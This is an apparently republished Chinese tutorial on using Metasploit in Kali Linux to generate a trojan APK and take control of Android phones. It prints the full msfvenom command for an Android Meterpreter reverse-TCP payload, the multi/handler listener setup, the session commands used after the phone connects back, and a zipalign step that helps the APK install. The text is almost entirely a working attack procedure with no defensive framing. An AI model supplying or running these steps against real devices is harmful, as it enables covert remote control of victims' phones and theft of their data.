Kali環境使用Metasploit產生木馬入侵安卓手機

來源:互聯網
上載者:User

標籤:bsp   data   安全性   http   開源   ever   本地   hack   模組   

Metasploit是一款開源的安全性漏洞偵查工具,可以協助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程式掃描,社交工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。

環境準備:

Kali2.0(msfVENOM、metasploit)
安卓手機或安卓模擬器

利用過程:

先查看本地IP地址

使用msfvenom產生apk木馬

 
1 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk

注釋:

LHOST = 接收反彈串連主機

LPORT = 接收反彈串連主機的監聽連接埠

172.16.105.184修改為本地的IP地址 5555是產生的連接埠號碼/root/apk.apk是產生的APK路徑

如顯示所示說明產生成功!

啟動msfconsole

輸入命令:

 
1 msfconsole

然後執行以下命令

 
123 use exploit/multi/handler //載入模組set payload android/meterpreter/reverse_tcp //選擇Payloadshow options //查看參數設定

這個payload裡邊有兩個參數要設定

LHOST和LPORT 表示地址和連接埠 預設的連接埠是4444 現在我們來更改設定

 
123 set LHOST 172.16.105.184 //這裡的地址設定成我們剛才產生木馬的IP地址 set LPORT 5555 //這裡的連接埠設定成剛才我們產生木馬所監聽的連接埠

配置完成後我們可以執行

 
1 show options //查看是否配置成功

最後我們把產生後的APK檔案安裝到模擬器或者手機中然後執行

 
1 exploit //開始執行漏洞 開始監聽,等待手機上線

我們可以發現有一個ID與本機處於串連狀態,現在我們可以執行

 
12 sessions //查看串連狀態sessions 1 //建立與ID值位1的主機串連

現在我們可以執行

 
1 sysinfo

更多命令參數可以使用help命令查看

PS:如果在操作過程中有什麼不懂的或遇到什麼問題可以在文章下方留言小殘看到後悔第一時間為大家解答

如果遇到部分手機會無法安裝產生後發APK檔案那麼我們可以zipalign工具最佳化處理

  
1 zipalign -v 4 apk.apk  napk1.apk

 

  標籤:漏洞

Kali環境使用Metasploit產生木馬入侵安卓手機

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.